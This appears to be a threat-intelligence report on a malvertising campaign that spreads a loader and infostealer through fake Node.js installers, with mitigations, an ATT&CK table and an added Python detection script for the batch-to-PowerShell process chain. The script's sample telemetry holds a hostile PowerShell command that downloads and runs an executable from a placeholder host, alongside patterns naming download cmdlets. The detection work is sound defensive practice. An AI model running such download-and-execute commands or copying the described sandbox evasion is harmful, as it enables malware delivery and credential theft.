EXECUTIVE SUMMARY
A financially motivated, Russian-speaking group is behind the recent OXLOADER campaign. The actors use a malvertising approach, purchasing Google Ads that masquerade as legitimate development tools to lure victims. Campaign activity has been observed primarily against organizations in the United States, with a focus on technology and financial services firms. Their objective is to install the CASTLESTEALER infostealer, enabling ongoing credential harvesting and personal data exfiltration.
The operation demonstrates a clear intent to monetize stolen information rather than to cause direct disruption. The infection begins when a user clicks a sponsored search result that redirects to a fake Node.js download page. That page serves a batch file hosted on a public file-sharing service; the batch file displays a counterfeit installation wizard and then invokes PowerShell to retrieve a second-stage executable. That executable, the loader, runs with elevated privileges, abuses the PE .reloc section to stage shellcode, and employs multiple self-decryption loops to unpack a .NET payload.
Once active, the payload establishes persistence, harvests credential stores, and communicates with remote servers to exfiltrate the collected data. The campaign is notable because its layered obfuscation and environment checks allow it to slip past many conventional antivirus products and sandbox analyses. Before continuing, the loader checks that the host has multiple CPUs, several gigabytes of memory, and a non-CIS geographic profile; many analysis sandboxes fail at least one of these gates, so the payload never detonates under automated analysis, while the use of legitimate-looking binaries reduces suspicion on a real host.

Organizations should tighten web-gateway filtering, block suspicious ad content, and enforce strict execution policies for PowerShell and batch scripts. Continuous monitoring for abnormal process chains and process injection, regular credential-vault audits, and robust backup routines further reduce the impact of a successful compromise.
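The delivery chain described above (batch file from a download folder, PowerShell fetching a second stage, a dropped executable running from a user-writable directory) is visible in endpoint process-creation telemetry. The script below is an added example, not code from the original report or from Elastic Security Labs: it runs two hypothetical detection rules over a constructed list of simplified Sysmon-style process-creation events. The field names, the directory and cmdlet patterns, the rule names and all sample paths and hosts are assumptions made for the example.

```python
"""Process-chain detection for the delivery sequence described above.

Added example; the event shape is a simplified, assumed stand-in for Sysmon
Event ID 1, not the real schema. Two rules are applied:
  1. cmd.exe running a .bat/.cmd from a user-writable path whose child
     PowerShell uses a download primitive;
  2. an .exe launched from a user-writable path with PowerShell in its
     ancestry (the fetched second stage).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the created process
    cmdline: str  # its command line


# Directories a standard user can write to; a stager dropped by a browser or a
# script almost always lands in one of these (pattern is an assumption).
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(Downloads|AppData)|Temp|ProgramData)\\", re.IGNORECASE)
# PowerShell download primitives commonly used by one-line stagers.
DOWNLOAD_PRIMITIVES = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString"
    r"|Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod|\birm\b",
    re.IGNORECASE)
BATCH_SCRIPT = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
              limit: int = 8) -> List[ProcEvent]:
    """Walk parent links upward; seen-set and limit guard against pid reuse."""
    chain: List[ProcEvent] = []
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen and len(chain) < limit:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for ev in events:
        name = basename(ev.image)
        # Rule 1: batch file in a user-writable path -> PowerShell download.
        if name in POWERSHELL and DOWNLOAD_PRIMITIVES.search(ev.cmdline):
            parent = by_pid.get(ev.ppid)
            if (parent is not None and basename(parent.image) == "cmd.exe"
                    and BATCH_SCRIPT.search(parent.cmdline)
                    and USER_WRITABLE.search(parent.cmdline)):
                findings.append(("batch_to_powershell_download", ev.pid))
        # Rule 2: executable in a user-writable path descended from PowerShell.
        if name.endswith(".exe") and USER_WRITABLE.search(ev.image):
            if any(basename(a.image) in POWERSHELL for a in ancestors(ev, by_pid)):
                findings.append(("powershell_spawned_user_writable_exe", ev.pid))
    return findings


# Constructed sample telemetry: paths, file names and .invalid hosts are made up.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\node-setup.bat"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -NoProfile -w hidden -c "Invoke-WebRequest '
              'http://stage.example.invalid/s2.exe -OutFile $env:TEMP\\s2.exe; '
              'Start-Process $env:TEMP\\s2.exe"'),
    ProcEvent(400, 300, r"C:\Users\alice\AppData\Local\Temp\s2.exe", "s2.exe"),
    # Benign control: an interactive PowerShell fetching a status endpoint.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "Invoke-WebRequest https://status.example.invalid/healthz"'),
    ProcEvent(600, 500, r"C:\Program Files\7-Zip\7z.exe", "7z.exe a backup.7z C:\\data"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the malicious branch (pids 300 and 400) fires; the benign PowerShell download (pid 500) is not flagged because its parent is not a batch file in a user-writable location, which is the parent-child correlation that keeps rule 1 from alerting on every `Invoke-WebRequest`. In a real deployment the patterns would be tuned to the environment's installer and software-distribution paths.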
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion | System Checks |
| Defense Evasion | T1574.001 | Hijack Execution Flow | DLL Search Order Hijacking |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
REFERENCES:
The following reports contain further technical details:
https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
https://www.elastic.co/security-labs/oxloader-malware-loader-infostealer